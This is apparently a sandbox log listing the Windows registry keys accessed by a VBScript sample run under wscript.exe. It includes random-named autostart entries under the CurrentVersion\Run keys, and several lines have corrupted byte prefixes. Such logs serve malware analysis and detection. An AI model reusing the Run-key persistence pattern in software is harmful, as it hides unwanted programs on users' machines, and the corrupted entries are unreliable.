HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Programs
HKEY_LOCAL_MACHINE\software\TrlLRLG2Z1SYOAj
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT\UserEra
HKEY_CURRENT_USER\Software\Policies\Microsoft\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TrlLRLG2Z1SYOAj\(Default)
HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TrlLRLG2Z1SYOAj
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\TrlLRLG2Z1SYOAj
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\IgnoreUserSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\Enabled
HKEY_CURRENT_USER\Software\Classes\AppID\wscript.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\Timeout
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CLASSES_ROOT\.vbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vbs\(Default)
HKEY_CLASSES_ROOT\VBSFile\ScriptEngine
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\ScriptEngine\(Default)
HKEY_CURRENT_USER\Software\Classes\VBScript
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBScript\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBScript\CLSID\(Default)
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\software\lXYOCrWYMY
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\lXYOCrWYMY\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lXYOCrWYMY
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lXYOCrWYMY
HKEY_CURRENT_USER\Software\Classes\winmgmts
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WINMGMTS\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WINMGMTS\CLSID\(Default)
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\409
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\9
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0\win32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionHigh
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\http\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\Feature_Enable_Compat_Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\Feature_Enable_Compat_Logging
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\UA Tokens
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
\xec\x88\xa0\xc8\x83EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Pre Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_UNC_SAVEDFILECHECK
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_UNC_SAVEDFILECHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\*
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xec\x88\xa0\xc8\x83EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
HKEY_CLASSES_ROOT\CLSID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}
HKEY_CLASSES_ROOT\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\ExtendedErrors
\xe7\xb1\xa8\xc8\xb1EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TrlLRLG2Z1SYOAj\(Default)
\xe7\xb1\xa8\xc8\xb1EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
\xe7\xbf\x90\xc8\xb1EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
\xe7\xbc\x90\xc8\xb1EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerRequestOverride\Driver
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ProcessID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnablePrivateObjectHeap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ContextLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ObjectLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Cimom
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\wmiprvse.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\6A7AE7C1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TreatAs
